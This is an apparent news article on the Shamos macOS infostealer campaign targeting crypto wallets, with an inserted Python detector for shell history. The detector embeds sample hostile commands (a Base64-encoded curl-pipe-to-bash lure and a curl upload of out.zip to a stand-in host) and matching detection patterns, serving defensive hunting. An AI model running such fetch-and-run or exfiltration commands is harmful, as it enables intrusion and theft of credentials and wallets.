Shamos Strikes: A New Threat to macOS Users' Crypto Wallets
From June to August 2025, cybersecurity experts from CrowdStrike recorded a large-scale campaign distributing Shamos malware, a variant of the Atomic macOS Stealer (AMOS) infostealer. The program attempted to compromise over 300 client environments worldwide, utilizing malvertising methods and fake GitHub repositories. The attacks, carried out by the COOKIE SPIDER group, were successfully blocked by the Falcon platform, but they underscore the growing threat to macOS users, especially crypto wallet owners.
The attackers lure victims through malicious ads on Google or fake tech support sites such as mac-safer.com and rescue-mac.com. These sites offer instructions for solving common macOS problems such as printer failures or security errors. Users are talked into copying a command, often Base64-encoded, and pasting it into Terminal; the command downloads a malicious Bash script, which in turn installs the Shamos Mach-O executable while bypassing Gatekeeper protection. Fake GitHub repositories mimicking legitimate projects such as iTerm2 are also used for distribution.
Once installed, Shamos scans the system, collecting passwords, Keychain data, Apple Notes, and browser information. Special attention is given to crypto wallet files, including popular platforms such as Electrum, Binance, Exodus, Atomic, and Coinomi. The collected data is archived into an out.zip file and sent to the attackers' servers using the curl command. Shamos operates in a malware-as-a-service model, where COOKIE SPIDER provides the tool to affiliates for targeted attacks, increasing the scale of the threat.
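The two observable behaviours described above, the Base64-encoded Terminal one-liner that fetches a script into a shell and the curl upload of out.zip, can be hunted for in collected shell history or command-line telemetry. The following detector is an added example, not CrowdStrike's or the article's code; the history lines and the example.invalid host are constructed, and the regexes are assumptions about how such commands typically look.

```python
import base64
import re

# A Base64 run long enough to hold a command (40+ chars, optional padding).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Indicators drawn from the campaign summary (assumed shapes, not exhaustive):
# a fetched script piped into a shell, a Base64 blob decoded into a shell, and
# a curl upload of the stealer's out.zip archive.
SUSPICIOUS = [
    ("remote-script-to-shell", re.compile(r"curl\b[^|]*\|\s*(ba)?sh\b")),
    ("base64-decode-to-shell", re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba)?sh\b")),
    ("out-zip-exfil", re.compile(r"curl\b.*(-F|--upload-file|-T|-d|--data-binary)\s*\S*out\.zip")),
]

# Constructed sample history (not real telemetry): a benign line, a ClickFix-style
# encoded lure, and an exfiltration upload.
_PAYLOAD = base64.b64encode(b"curl -fsSL https://example.invalid/fix.sh | bash").decode()
SAMPLE_HISTORY = [
    "git clone https://example.invalid/iterm2.git",
    f"echo {_PAYLOAD} | base64 -d | bash",
    'curl -X POST -F "file=@/tmp/out.zip" https://example.invalid/upload',
]

def decode_b64_runs(line: str) -> list[str]:
    """Return text decodings of any long Base64 runs embedded in the line."""
    decoded = []
    for m in B64_RUN.finditer(line):
        blob = m.group(0)
        try:
            text = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded

def classify(line: str) -> list[str]:
    """Names of matching indicators for one line, checking the raw text and any
    decoded Base64 payload so the encoding does not hide the fetch-and-run."""
    candidates = [line] + decode_b64_runs(line)
    return [name for name, pat in SUSPICIOUS if any(pat.search(c) for c in candidates)]

def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (index, indicators) for every line that triggers at least one rule."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := classify(line))]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_HISTORY):
        print(f"line {idx}: {', '.join(hits)} -> {SAMPLE_HISTORY[idx][:60]}")
```

Feeding real `~/.zsh_history` or EDR process command lines through `scan` is the intended use; tune the indicator list to the environment before alerting on it.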
CrowdStrike advises users to avoid downloading files from untrusted sources, including suspicious GitHub repositories and ad links. For macOS issues, users should turn to official Apple forums or use the built-in help feature (Cmd + Space → 'Help'). Implementing endpoint protection and DNS filters can prevent compromise. To protect crypto assets, experts recommend using multi-factor authentication, regularly updating software, and storing keys in hardware wallets.
Shamos attacks highlight the vulnerability of macOS users, especially in the context of the cryptocurrency market, where wallet theft losses can reach millions of dollars. The rise of decentralized finance (DeFi) makes such threats particularly relevant. While incidents may temporarily undermine trust in platforms, they also stimulate the development of more reliable asset storage solutions, such as cold wallets and improved blockchain protocols. Users should strengthen security measures to minimize risks.